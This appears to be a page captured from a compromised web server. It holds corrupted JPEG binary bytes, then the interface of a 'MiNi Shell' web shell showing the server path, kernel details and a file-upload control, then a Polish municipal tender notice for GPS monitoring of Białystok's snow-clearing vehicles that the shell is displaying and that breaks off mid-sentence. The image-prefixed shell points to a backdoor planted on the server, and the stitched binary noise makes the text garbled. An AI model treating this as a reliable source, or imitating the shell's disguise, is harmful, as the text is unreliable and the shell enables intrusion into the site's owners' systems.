JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210817/0015145601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa Elektronicznego Systemu Kontroli Pojazdów biorących udział w zimowym oczyszczaniu miasta Białegostoku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Białystok</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050658640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Słonimska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-950</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dgk@um.bialystok.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.bialystok.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa Elektronicznego Systemu Kontroli Pojazdów biorących udział w zimowym oczyszczaniu miasta Białegostoku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f5515af6-fa96-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00151456</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000363/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.17 Monitoring pojazdów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.miastobialystok.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy<br/>zakupowej https://miastobialystok.ezamawiajacy.pl/, zwanej dalej „Platformą”, przez co należy rozumieć narzędzie umożliwiające realizację procesu związanego z udzielaniem zamówień publicznych<br/>przy użyciu środków komunikacji elektronicznej, służące w szczególności do przekazywania ofert, oświadczeń i dokumentów; adres strony internetowej https://miastobialystok.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne: 1. Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne,<br/>umożliwiające pracę na Platformie, tj.:1) stały dostęp do sieci Internet o gwarantowanej przepustowości<br/>nie mniejszej niż 512 kb/s;2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB<br/>Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux,<br/>lub ich nowsze wersje;3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2,<br/>najlepiej w najnowszej wersji, w przypadku Internet Explorer - minimalnie wersja 10.0;4) włączona<br/>obsługa JavaScript;5) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie<br/>.pdf.2. Zamawiający określa dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100<br/>MB w: txt, rtf, pdf, xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png,<br/>svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml,<br/>xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.3. Zamawiający określa<br/>informacje na temat kodowania i czasu odbioru danych, tj.: plik załączony przez Wykonawcę na<br/>Platformie i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8.<br/>Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie<br/>terminu otwarcia ofert.4. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego odpowiednim<br/>źródłem czasu.II. Wymagania organizacyjne: 1. W postępowaniu o udzielenie zamówienia komunikacja<br/>pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków,<br/>zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem Platformy<br/>znajdującej się pod adresem: https://miastobialystok.ezamawiajacy.pl/ w zakładce „Korespondencja”.2.<br/>Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane<br/>są przez Wykonawcę za pośrednictwem Platformy znajdującej się pod adresem:https://miastobialystok.ezamawiajacy.pl/ w zakładce „Korespondencja”. Za datę przekazania<br/>zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych<br/>kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w Rozporządzeniu<br/>Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz<br/>Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od Wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119, str. 1 z 2016 r., sprost. Dz. Urz. UE. L 127, str.<br/>2<br/>z 2018 r.) (w skrócie „RODO”), informuję, że:<br/>1. Administratorem danych jest Prezydent Miasta Białegostoku, Urząd Miejski w Białymstoku,<br/>ul. Słonimska 1, 15-950 Białystok;<br/>2. W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z inspektorem<br/>ochrony danych: Urząd Miejski w Białymstoku, ul. Słonimska 1, 15-950 Białystok, tel. 85 879 79 79, email:<br/>bbi@um.bialystok.pl;<br/>3. Pani/Pana dane przetwarzane będą w celu przeprowadzenia zamówienia publicznego na podstawie<br/>art. 6 ust. 1 lit. c) RODO, zgodnie z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych<br/>(Pzp) oraz w celu zawarcia umowy na podstawie art. 6 ust. 1 lit. b) RODO;<br/>4. Pani/Pana dane osobowe będą przechowywane:<br/>1) przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia (jeżeli okres<br/>obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, okres przechowywania<br/>dokumentacji obejmuje cały okres obowiązywania umowy) - zgodnie z art. 78 ust. 1 i 4 ustawy Pzp;<br/>2) przez okres 5 lat liczonych od końca roku, w którym postępowanie zostanie zakończone<br/>– w przypadku dokumentacji z postępowania o udzielenie zamówienia;<br/>3) przez okres 10 lat liczonych od końca roku, w którym umowa zostanie zrealizowana<br/>– w przypadku umów zwartych w postępowaniu o udzielenie zamówienia;<br/>4) w przypadku postępowań finansowanych ze środków unijnych przez czas trwania projektu;<br/>5. Pani/Pana dane będą udostępniane podmiotom, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp oraz podmiotom, którym administrator<br/>powierzył przetwarzanie danych na mocy art. 28 ust. 3 RODO;<br/>6. Przysługuje Pani/Panu prawo do:<br/>1) prawo do dostępu do danych, na zasadach określonych w art. 15 RODO;<br/>2) prawo do sprostowania danych, na zasadach określonych w art. 16 RODO;<br/>3) prawo do usunięcia danych („prawo do bycia zapomnianym”), na zasadach określonych w art. 17 RODO;<br/>4) prawo do ograniczenia przetwarzania, na zasadach określonych w art. 18 RODO.<br/>7. Przysługuje Pani/Panu prawo do wniesienia skargi do organu nadzorczego, którym jest Prezes<br/>Urzędu Ochrony Danych Osobowych;<br/>8. Podanie danych osobowych jest wymogiem ustawowym, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają<br/>z ustawy Pzp;<br/>9. Dane osobowe nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DGK-IV.271.69.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: usługa Elektronicznego Systemu Kontroli Pojazdów biorących<br/>udział w zimowym oczyszczaniu miasta Białegostoku.<br/>2. Zakres zamówienia obejmuje:<br/>2.1. Prace objęte ryczałtem:<br/>Zadanie I – elektroniczny system kontroli pojazdów GPS:<br/>A. Prace przygotowawcze (wstępne):<br/>a) montaż modułów GPS na 120 szt. pojazdów, w tym:<br/>• 44 szt. pługo-posypywarek do prac na ulicach głównych<br/>• 8 szt. ulicznych zamiatarek mechanicznych<br/>• 10 szt. samochodów towarowo-osobowych do przewozu osób i sprzętu<br/>• 16 szt. pojazdów do prac na ulicach osiedlowych<br/>• 10 szt. ciągników do prac na chodnikach osiedlowych<br/>• 25 szt. ciągników do prac na chodnikach głównych<br/>• 7 szt. chodnikowych zamiatarek mechanicznych<br/>b) montaż i uruchomienie kompletnych modułów GPS Wykonawcy wraz z czujnikami na każdym<br/>z pojazdów biorących udział w zimowym oczyszczaniu miasta Białegostoku<br/>c) dostarczenie Zamawiającemu protokołów potwierdzających montaż urządzeń podpisanych<br/>przez Wykonawcę oraz przedstawiciela firmy odśnieżającej<br/>d) przeszkolenie kierowców pojazdów w obsłudze zamontowanych urządzeń,<br/>e) umożliwienie na dowolnej ilości stanowisk komputerowych Zamawiającego zainstalowania<br/>pakietów oprogramowania klienckiego systemu monitoringu pojazdów lub możliwość kodowania<br/>wejścia na stronę internetową i dostęp do informacji online do wszystkich pojazdów<br/>f) umożliwienie na maksymalnie 20 stanowiskach komputerowych firm odśnieżających, na<br/>których sprzęcie zamontowano urządzenia GPS, poprzez zainstalowanie pakietów<br/>oprogramowania klienckiego systemu monitoringu pojazdów lub możliwość kodowania wejścia<br/>na stronę internetową i dostęp do informacji online wyłącznie do tych pojazdów, na których<br/>zamontowano urządzenia GPS (niedopuszczalne jest, aby firmy miały dostęp do danych o<br/>pojazdach innych firm odśnieżających) g) przeszkolenie maksymalnie 50 osób, zwanych dalej Użytkownikami, wskazanych przez<br/>Zamawiającego w zakresie obsługi systemu monitoringu pojazdów<br/>B. Bieżące utrzymanie:<br/>a) bieżące utrzymanie oraz serwis modułów GPS<br/>b) bieżące, ciągłe działanie systemu monitoringu pojazdów, w tym m.in.:<br/>• rejestracja mierzonych parametrów oraz transmisja danych,<br/>• udostępnianie informacji poprzez zapewnienie Zamawiającemu dostępu do bazy danych; dane<br/>powinny być przechowywane i dostępne dla Zamawiającego z możliwością ich odtwarzania do 2<br/>lat od zakończenia umowy,<br/>• udzielanie drogą telefoniczną konsultacji w zakresie użytkowania systemu będącego<br/>przedmiotem niniejszej umowy,<br/>• elektroniczny system kontroli pojazdów powinien posiadać aktualną mapę do wizualizacji tras i<br/>położenia pojazdów biorących udział w zimowym oczyszczaniu miasta Białegostoku<br/>umożliwiających monitorowanie pojazdów oraz analizę danych zarejestrowanych przez<br/>urządzenia GPS<br/>c) oprogramowanie powinno dostarczać jego Użytkownikowi niezbędne dane o pracy pojazdów,<br/>takich jak m.in.:<br/>• opis punktu położenia pojazdu w zdefiniowanym przedziale czasowym,<br/>• maksymalną oraz średnią prędkość pojazdu na danym odcinku,<br/>• czas i miejsce trwania postoju,<br/>• informowanie o wszelkiego rodzaju alarmach dotyczących zainstalowanych urządzeń<br/>pomiarowych (np. włamania, próby odcięcia zasilania oraz inne opcjonalne dane zdefiniowane<br/>przez użytkownika, odczyt danych telemetrycznych z zainstalowanych w pojeździe urządzeń<br/>pomiarowych),<br/>• możliwość śledzenia wybranych pojazdów w czasie rzeczywistym<br/>z dokładnością do 20 m,<br/>• możliwość zlokalizowania wskazanego pojazdu w dowolnej chwili,<br/>• możliwość kreślenia na mapie przebytej trasy (wraz z miejscami postoju) przez poszczególne<br/>pojazdy,<br/>• możliwość punktowego wskazania lokalizacji pojazdów na mapie we wskazanym konkretnym<br/>czasie i dacie dla poszczególnych pojazdów,<br/>• przedstawianie historii przebytej trasy w formie tabelarycznej oraz graficznej,<br/>• tabelaryczne zestawienie informacji o czasie pracy poszczególnych pojazdów, ilości<br/>przejechanych kilometrów ulic, chodników przez poszczególne pojazdy w określonym przedziale<br/>czasowym,<br/>• system ma być czytelny, zapewniać łatwość identyfikacji pojazdów za pomocą wizualizacji<br/>pojazdów (firma, sektor, ikona pojazdu itp.), a także powinien zawierać odrębnie wydzielone<br/>zakładki dla pojazdów m.in.: ulic głównych, ulic osiedlowych, chodników oraz innych pojazdów .<br/>Każdy Użytkownik powinien mieć możliwości indywidualnego konfigurowania zakładek. W<br/>określonej zakładce powinny być wyświetlone wyłącznie pojazdy z wybranej grupy oraz<br/>czytelnie wyświetlona dokładna ilość pojazdów pracujących w terenie,<br/>• wszelkie raporty, historie tras w formie tabelarycznej czy też graficznej powinny posiadać opcję<br/>wyboru dla jednego, kilku, bądź wszystkich pojazdów i wygenerowania żądanego raportu<br/>(graficznego bądź tabelarycznego),<br/>• niedopuszczalne jest, aby Zamawiający musiał generować raporty, wskazania, wykresy oraz<br/>inne archiwalne dane oddzielnie dla każdego pojazdu, w celu uzyskania raportu zbiorczego dla<br/>określonej przez Zamawiającego liczby pojazdów.<br/>C. Demontaż:<br/>a) demontaż modułów GPS i czujników<br/>2.2. Prace zlecane protokołami konieczności:<br/>Zadanie I – elektroniczny system kontroli pojazdów GPS:<br/>a) Zamawiający dopuszcza możliwość zlecenia Wykonawcy montażu i uruchomienia<br/>dodatkowych modułów GPS na pojazdach do 50 szt. na zasadach opisanych dla prac objętych ryczałtem w punktach A-C Zadania I oraz poniższych wytycznych: • dodatkowo zamontowane moduły GPS powinny się znaleźć w systemie monitoringu pojazdów,<br/>o którym mowa w pracach objętych ryczałtem<br/>• Zamawiający zastrzega możliwość zlecenia Wykonawcy prac dodatkowych w każdym<br/>momencie trwania umowy<br/>b) Zamawiający dopuszcza możliwość zlecenia Wykonawcy przełożenia modułów/czujników<br/>GPS na pojazdach do 30 szt. na zasadach opisanych dla prac objętych ryczałtem w Zadaniu I<br/>wykonując kolejno prace z punktu C i następnie prace z punktu A (lit. b-d)<br/>Zadanie II – elektroniczny system monitoringu wizyjnego:<br/>A. Prace przygotowawcze (wstępne):<br/>a) montaż i uruchomienie monitoringu wizyjnego we wskazanych przez Zamawiającego<br/>miejscach załadunku pojazdów chlorkiem sodu lub innymi materiałami do likwidacji śliskości<br/>b) firma biorąca udział w zimowym oczyszczaniu miasta Białegostoku (firma odśnieżająca), na<br/>terenie której odbędzie się montaż monitoringu, zapewnia źródła zasilania elektrycznego i<br/>połączenia internetowego do prawidłowego funkcjonowania monitoringu<br/>c) Zamawiający zleci zainstalowanie monitoringu wizyjnego w maksymalnie 8 miejscach<br/>d) dostarczenie Zamawiającemu protokołów potwierdzających montaż urządzeń podpisanych<br/>przez Wykonawcę oraz przedstawiciela firmy odśnieżającej<br/>e) umożliwienie na maksymalnie 10 stanowiskach komputerowych Zamawiającego<br/>zainstalowania pakietów oprogramowania klienckiego systemu monitoringu wizyjnego miejsc<br/>załadunku pojazdów lub możliwość kodowania wejścia na stronę internetową i dostęp do<br/>informacji online<br/>f) przeszkolenie 10 osób w zakresie obsługi systemu monitoringu wizyjnego pojazdów<br/>B. Bieżące utrzymanie:<br/>a) bieżące utrzymanie oraz serwis monitoringu wizyjnego<br/>• Zamawiający powinien mieć możliwość podglądu obrazu w czasie rzeczywistym o każdej<br/>porze w trakcie trwania umowy,<br/>• zapis cyfrowy z kamer powinien być zapisywany na serwerach Wykonawcy i przechowywany<br/>przez okres przynajmniej 7 dni,<br/>• Zamawiający powinien mieć możliwość podglądu obrazu zapisanego na serwerach<br/>Wykonawcy o każdej porze w trakcie trwania umowy przynajmniej 7 dni od momentu<br/>zarejestrowania danych,<br/>• jakość obrazu powinna umożliwiać weryfikację faktu załadunku chlorku sodu oraz numerów<br/>rejestracyjnych pojazdów, na które jest ładowany.<br/>C. Demontaż:<br/>a) demontaż monitoringu wizyjnego<br/>W przypadku stwierdzenia awarii, modułu GPS/czujnika, monitoringu wizyjnego Wykonawca<br/>zobowiązany jest do naprawy uszkodzeń. Rozpoczęcie napraw nie później niż 12 godzin od<br/>zgłoszenia lub stwierdzenia awarii systemu, jego elementu lub przyczyn niestabilnej pracy oraz<br/>ich usunięcie w terminie do max. 24 godzin* od momentu zgłoszenia awarii (*czas reakcji będzie<br/>oceniany w kryterium oceny ofert zgodnie z opisem w rozdz. XIX SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">51240000-6 - Usługi instalowania urządzeń nawigacyjnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-10-16 do 2024-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska<br/>największą łączną ilość punktów za wszystkie kryteria oceny ofert. 2. Jeżeli nie można wybrać<br/>najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub<br/>kosztu i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała<br/>najwyższą ocenę w kryterium o najwyższej wadze. 3. Jeżeli oferty otrzymały taką samą ocenę w<br/>kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną lub najniższym kosztem.<br/>4. Jeżeli nie można dokonać wyboru oferty, w sposób o którym mowa w pkt 4, Zamawiający wzywa<br/>Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert<br/>dodatkowych zawierających nową cenę lub koszt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje 